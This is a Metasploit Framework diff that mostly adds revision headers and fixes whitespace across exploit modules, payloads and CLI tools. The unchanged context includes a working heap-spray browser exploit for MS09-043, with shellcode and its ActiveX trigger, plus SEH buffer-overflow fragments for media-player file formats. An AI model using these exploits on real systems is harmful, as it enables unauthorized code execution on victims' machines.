a/modules/exploits/windows/backdoor/energizer_duo_payload.rb b/modules/exploits/windows/backdoor/energizer_duo_payload.rb index 2d6d037209..6a8bba8838 100644 --- a/modules/exploits/windows/backdoor/energizer_duo_payload.rb +++ b/modules/exploits/windows/backdoor/energizer_duo_payload.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -5,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Energizer DUO Trojan Code Execution', 'Description' => %q{ - This module will execute an arbitrary payload against - any system infected with the Arugizer trojan horse. This - backdoor was shipped with the software package accompanying - the Energizer Duo USB battery charger. + This module will execute an arbitrary payload against + any system infected with the Arugizer trojan horse. This + backdoor was shipped with the software package accompanying + the Energizer Duo USB battery charger. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 65c8d5467f..cfa09c63e8 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' @@ -18,17 +22,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Adobe JBIG2Decode Memory Corruption Exploit', 'Description' => %q{ This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. - This module relies upon javascript for the heap spray. + This module relies upon javascript for the heap spray. }, 'License' => MSF_LICENSE, 'Author' => [ - # Metasploit implementation - 'natron', - # bl4cksecurity blog explanation of vuln [see References] - 'xort', 'redsand', - # obfuscation techniques and pdf template from util_printf - 'MC', 'Didier Stevens ', + # Metasploit implementation + 'natron', + # bl4cksecurity blog explanation of vuln [see References] + 'xort', 'redsand', + # obfuscation techniques and pdf template from util_printf + 'MC', 'Didier Stevens ', ], 'Version' => '$Revision$', 'References' => @@ -54,7 +58,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 2009', 'DefaultTarget' => 0)) - end def autofilter diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 05b2262a75..de38792b1f 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' @@ -18,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Adobe util.printf() Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional - < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() - entry, an attacker may be able to execute arbitrary code. + < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() + entry, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ' ], diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index fc8e5f24d6..f4f3855039 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'MSB', 'MS09-043' ], [ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ], - ], + ], 'DefaultOptions' => { 'EXITFUNC' => 'process', @@ -43,17 +43,17 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => '', + 'BadChars' => '', 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Jul 13 2009', 'DefaultTarget' => 0)) - + @javascript_encode_key = rand_text_alpha(rand(10) + 10) end @@ -68,45 +68,45 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") - - + + shellcode = Rex::Text.to_unescape(p.encoded) retaddr = Rex::Text.to_unescape([target.ret].pack('V')) - + js = %Q| - + var xshellcode = unescape("#{shellcode}"); - + var xarray = new Array(); var xls = 0x81000-(xshellcode.length*2); var xbigblock = unescape("#{retaddr}"); - + while( xbigblock.length < xls / 2) { xbigblock += xbigblock; } var xlh = xbigblock.substring(0, xls / 2); delete xbigblock; - + for(xi=0; xi<0x99*2; xi++) { xarray[xi] = xlh + xlh + xshellcode; } - + CollectGarbage(); - + var xobj = new ActiveXObject("OWC10.Spreadsheet"); - + xe = new Array(); xe.push(1); xe.push(2); xe.push(0); xe.push(window); - + for(xi=0; xi < xe.length; xi++){ for(xj=0; xj<10; xj++){ try { xobj.Evaluate(xe[xi]); } catch(e) { } } } - + window.status = xe[3] + ''; - + for(xj=0; xj<10; xj++){ try{ xobj.msDataSourceObject(xe[3]); } catch(e) { } } @@ -118,14 +118,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj} } ).to_s - - + + # Encode the javascript payload with the URI key # js = encrypt_js(js, @javascript_encode_key) - + # Fire off the page to the client send_response(cli, "") - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 09b6038ebf..0a42afa2d9 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -1,5 +1,5 @@ ## -# $id$ +# $Id$ ## ## diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f85d9751ba..bce0fa72a2 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' require 'zlib' diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index e791d04250..073a1dacfa 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -17,9 +21,9 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', 'Description' => %q{ - This module exploits a stack overflow in Media Jukebox 8.0.400 - By creating a specially crafted m3u or pls file, an an attacker may be able - to execute arbitrary code. + This module exploits a stack overflow in Media Jukebox 8.0.400 + By creating a specially crafted m3u or pls file, an an attacker may be able + to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => @@ -70,4 +74,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index f1da192b16..2516bc9231 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + # direct ret overwrite at offset 1024 # nseh overwrite at offset 1040 ret_offset = 1024 @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote | stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub).encode_string m3u[seh_offset - stub.length, stub.length] = stub - + # Jump back to the stub jmp2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + stub.length.to_s).encode_string seh = '' diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 6e2a52d497..0dbc140666 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # metasploit module ], + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62163' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 7e5b58dbbb..7cb468bee1 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -26,6 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5457' ], diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 56ad5f02f4..4d6157c931 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4008' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index c755d445db..07393d9f69 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: $', + 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4178' ], diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index 55ae5a380b..0fc6e42007 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -45,6 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Trancer ', # Metasploit implementation 'jduck' ], + 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.pank4j.com/exploits/httpdxb0f.php' ], diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index cd702c6ec3..e14ea87364 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # original discovery and metasploit module ], + 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '60182' ] diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 2eeffbb179..1a077a4dbc 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' ### # Linux Chmod(file, mode) diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 248496e351..7e3a2fe8dd 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - ### # # Exec diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index c49e9883c8..e4b5dabd80 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/windows/exec' - ### # # Executes a command on the target machine diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index 2190055d81..b38ee4c6ef 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'msf/core/handler/bind_tcp' diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index e6d8ac10d3..2079d18db9 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index c0b8587903..47daaaf731 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/osx/bundleinject' - ### # # Injects an arbitrary DLL in the exploited process. diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index 41d5f6179e..6a3b68cfcd 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ b/modules/payloads/stages/windows/dllinject.rb @@ -1,9 +1,19 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com) require 'msf/core' require 'msf/core/payload/windows/reflectivedllinject' - ### # # Injects an arbitrary DLL in the exploited process via a reflective loader. @@ -14,4 +24,3 @@ module Metasploit3 include Msf::Payload::Windows::ReflectiveDllInject end - diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb index 0c5f7ba401..fea3e648a1 100644 --- a/modules/payloads/stages/windows/patchupdllinject.rb +++ b/modules/payloads/stages/windows/patchupdllinject.rb @@ -9,11 +9,9 @@ # http://metasploit.com/framework/ ## - require 'msf/core' require 'msf/core/payload/windows/dllinject' - ### # # Injects an arbitrary DLL in the exploited process. @@ -23,4 +21,4 @@ module Metasploit3 include Msf::Payload::Windows::DllInject -end \ No newline at end of file +end diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 4d8f1b0584..bea6a25930 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Copyright (c) 2008 Stephen Fewer of Harmony Security (www.harmonysecurity.com) require 'msf/core' diff --git a/modules/payloads/stages/windows/x64/vncinject.rb b/modules/payloads/stages/windows/x64/vncinject.rb index 0be1215b9a..6cdfdae213 100644 --- a/modules/payloads/stages/windows/x64/vncinject.rb +++ b/modules/payloads/stages/windows/x64/vncinject.rb @@ -21,7 +21,7 @@ require 'msf/base/sessions/vncinject' module Metasploit3 include Msf::Payload::Windows::ReflectiveDllInject_x64 - + def initialize(info = {}) super(update_info(info, 'Name' => 'Windows x64 VNC Server (Reflective Injection)', @@ -29,7 +29,7 @@ module Metasploit3 'Description' => 'Inject a VNC Dll via a reflective loader (Windows x64) (staged)', 'Author' => [ 'sf' ], 'Session' => Msf::Sessions::VncInject )) - + # Override the DLL path with the path to the meterpreter server DLL register_options( @@ -85,9 +85,9 @@ module Metasploit3 flags = 0 flags |= 1 if (datastore['DisableCourtesyShell']) - + flags |= 2 if (datastore['DisableSessionTracking']) - + # Transmit the one byte flag session.rstream.put([ flags ].pack('C')) @@ -104,7 +104,7 @@ module Metasploit3 print_status("Launched vnciewer in the background.") end end - + super end diff --git a/msfcli b/msfcli index 694dd15c61..340004565b 100755 --- a/msfcli +++ b/msfcli @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface allows users to interact with the framework through a # command line interface (CLI) rather than having to use a prompting console # or web-based interface. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -17,7 +21,7 @@ require 'rex' require 'msf/ui' require 'msf/base' -Indent = ' ' +Indent = ' ' if(RUBY_PLATFORM =~ /mswin32/) $stderr.puts "[*] The msfcli interface is not supported on the native Windows Ruby\n" @@ -73,7 +77,7 @@ end if (not exploit_name) ext = '' - + tbl = Rex::Ui::Text::Table.new( 'Header' => 'Exploits', 'Indent' => 4, @@ -83,7 +87,7 @@ if (not exploit_name) tbl << [ 'exploit/' + name, mod.new.name ] } ext << tbl.to_s + "\n" - + tbl = Rex::Ui::Text::Table.new( 'Header' => 'Auxiliary', 'Indent' => 4, @@ -92,9 +96,9 @@ if (not exploit_name) $framework.auxiliary.each_module { |name, mod| tbl << [ 'auxiliary/' + name, mod.new.name ] } - + ext << tbl.to_s + "\n" - + usage(nil, ext) end @@ -107,7 +111,7 @@ case exploit_name when /exploit\/(.*)/ exploit = $framework.exploits.create($1) module_class = 'exploit' - + when /auxiliary\/(.*)/ exploit = $framework.auxiliary.create($1) module_class = 'auxiliary' @@ -129,10 +133,10 @@ if (exploit == nil) end exploit.init_ui( - Rex::Ui::Text::Input::Stdio.new, + Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new ) - + # Evalulate the command (default to "help") mode = ARGV.pop || 'h' @@ -174,22 +178,22 @@ case mode.downcase $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(encoder, Indent)) if encoder $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_module(nop, Indent)) if nop - + when "o" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(encoder, Indent)) if encoder - $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_options(nop, Indent)) if nop when "a" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(encoder, Indent)) if encoder - $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_advanced_options(nop, Indent)) if nop when "i" $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(exploit, Indent)) $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(payload, Indent)) if payload $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(encoder, Indent)) if encoder - $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(nop, Indent)) if nop + $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_evasion_options(nop, Indent)) if nop when "p" if (module_class == 'exploit') $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_compatible_payloads(exploit, Indent, "Compatible payloads")) @@ -201,13 +205,13 @@ case mode.downcase $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_exploit_targets(exploit, Indent)) else $stdout.puts("\nError: This type of module does not support targets") - end + end when "ac" if (module_class == 'auxiliary') $stdout.puts("\n" + Msf::Serializer::ReadableText.dump_auxiliary_actions(exploit, Indent)) else $stdout.puts("\nError: This type of module does not support actions") - end + end when "c" if (module_class == 'exploit') begin @@ -227,9 +231,9 @@ case mode.downcase $stdout.puts("\nError: This type of module does not support the check feature") end when "e" - + case module_class - when 'exploit' + when 'exploit' begin session = exploit.exploit_simple( 'Encoder' => exploit.datastore['ENCODER'], @@ -266,7 +270,7 @@ case mode.downcase $stderr.puts("Auxiliary failed: #{$!}") $stderr.puts("Backtrace:") $stderr.puts($!.backtrace.join("\n")) - end + end end else usage("Invalid mode #{mode}") diff --git a/msfconsole b/msfconsole index 4bffe80cfd..cb90d95829 100755 --- a/msfconsole +++ b/msfconsole @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides users with a command console interface to the # framework. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -57,12 +61,12 @@ class OptsConsole opts.on("-v", "--version", "Show version") do |v| options['Version'] = true end - + # Boolean switch. opts.on("-L", "--real-readline", "Use the system Readline library instead of RbReadline") do |v| options['RealReadline'] = true end - + opts.separator "" opts.separator "Common options:" diff --git a/msfd b/msfd index c2d21c1648..e54a495917 100755 --- a/msfd +++ b/msfd @@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface listens on a port and provides clients that connect to # it with an msfconsole instance. The nice thing about this interface is that # it allows multiple clients to share one framework instance and thus makes it # possible for sessions to to be shared from a single vantage point. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfelfscan b/msfelfscan index d4ce4d44af..9693aabe19 100755 --- a/msfelfscan +++ b/msfelfscan @@ -1,6 +1,8 @@ #!/usr/bin/env ruby - +# # $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfencode b/msfencode index bcdcf1151a..0247904404 100755 --- a/msfencode +++ b/msfencode @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfgui b/msfgui index 89d6aec3da..c8571fce54 100755 --- a/msfgui +++ b/msfgui @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This is a basic user interface using the Gtk2 GUI library # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfmachscan b/msfmachscan index b8739a9925..d8cf52dca6 100755 --- a/msfmachscan +++ b/msfmachscan @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfopcode b/msfopcode index 5400866ace..525cbb9795 100755 --- a/msfopcode +++ b/msfopcode @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides a command line interface to the Metasploit # Opcode Database. It provides users with the ability to search for opcodes # and to display information about modules. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfpayload b/msfpayload index 72c30ad528..aa61ab9e3f 100755 --- a/msfpayload +++ b/msfpayload @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfpescan b/msfpescan index 8021b5fb90..cd688aef97 100755 --- a/msfpescan +++ b/msfpescan @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/msfrpc b/msfrpc index 950ecb4f2c..cf53edcaf5 100755 --- a/msfrpc +++ b/msfrpc @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface allows users to interact with a remote framework # instance through a XMLRPC socket. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -25,7 +29,7 @@ arguments = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ] ) -opts = { +opts = { 'User' => 'msf', 'SSL' => true, 'ServerPort' => 55553 @@ -69,7 +73,7 @@ $0 = "msfrpc" rpc = Msf::RPC::Client.new( :host => opts['ServerHost'], :port => opts['ServerPort'], - :ssl => opts['SSL'] + :ssl => opts['SSL'] ) res = rpc.login(opts['User'], opts['Pass']) diff --git a/msfrpcd b/msfrpcd index 8fb0d66218..5a1a0e8fbc 100755 --- a/msfrpcd +++ b/msfrpcd @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface listens on a port and provides clients that connect to # it with an XMLRPC interface to the Metasploit Framework. # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) @@ -27,7 +31,7 @@ arguments = Rex::Parser::Arguments.new( "-f" => [ false, "Run the daemon in the foreground" ], "-h" => [ false, "Help banner" ]) -opts = { +opts = { 'RunInForeground' => true, 'SSL' => true, 'ServerHost' => '0.0.0.0', @@ -54,9 +58,9 @@ arguments.parse(ARGV) { |opt, idx, val| when "-f" foreground = true when "-t" - opts['ServerType'] = val + opts['ServerType'] = val when "-u" - opts['URI'] = val + opts['URI'] = val when "-h" print("\nUsage: #{File.basename(__FILE__)} \n" + arguments.usage) exit diff --git a/msfweb b/msfweb index 253d29408c..29c54c00bb 100755 --- a/msfweb +++ b/msfweb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This user interface provides users with a web-based interface to the framework # +# $Revision$ +# msfbase = __FILE__ while File.symlink?(msfbase) diff --git a/plugins/auto_add_route.rb b/plugins/auto_add_route.rb index 630f7d22ac..b2b1b29468 100644 --- a/plugins/auto_add_route.rb +++ b/plugins/auto_add_route.rb @@ -1,3 +1,8 @@ +# +# $Id$ +# $Revision$ +# + module Msf class Plugin::AutoAddRoute < Msf::Plugin include Msf::SessionEvent diff --git a/plugins/db_credcollect.rb b/plugins/db_credcollect.rb index 5943f561f8..fa71b2a5fc 100644 --- a/plugins/db_credcollect.rb +++ b/plugins/db_credcollect.rb @@ -1,4 +1,11 @@ +# +# $Id$ +# # credcollect - tebo[at]attackresearch.com +# +# $Revision$ +# + module Msf class Plugin::CredCollect < Msf::Plugin diff --git a/plugins/db_mysql.rb b/plugins/db_mysql.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_mysql.rb +++ b/plugins/db_mysql.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_postgres.rb b/plugins/db_postgres.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_postgres.rb +++ b/plugins/db_postgres.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_sqlite2.rb b/plugins/db_sqlite2.rb index 0d74f35e2e..f627d188ec 100644 --- a/plugins/db_sqlite2.rb +++ b/plugins/db_sqlite2.rb @@ -1,3 +1,7 @@ +# +# $Id$ +# $Revision$ +# module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_sqlite3.rb b/plugins/db_sqlite3.rb index 0d74f35e2e..dc1546ae6a 100644 --- a/plugins/db_sqlite3.rb +++ b/plugins/db_sqlite3.rb @@ -1,3 +1,7 @@ +## +# $Id$ +# $Revision$ +## module Msf class Plugin::DeprecatedStub < Msf::Plugin diff --git a/plugins/db_tracker.rb b/plugins/db_tracker.rb index 898aea5ea1..d36239f767 100644 --- a/plugins/db_tracker.rb +++ b/plugins/db_tracker.rb @@ -1,7 +1,12 @@ +# +# $Id$ +# $Revision$ +# + module Msf ### -# +# # This class hooks all socket calls and updates the database with # data gathered from the connection parameters # @@ -26,21 +31,21 @@ class Plugin::DB_Tracer < Msf::Plugin if (sock.peerhost != '0.0.0.0' and sock.peerport) - # Ignore sockets that didn't set up their context + # Ignore sockets that didn't set up their context # to hold the framework in 'Msf' return if not param.context['Msf'] host = param.context['Msf'].db.find_or_create_host(:host => sock.peerhost, :state => Msf::HostState::Alive) return if not host - + param.context['Msf'].db.report_service(:host => host, :proto => param.proto, :port => sock.peerport) end - end + end end - + def initialize(framework, opts) super - + 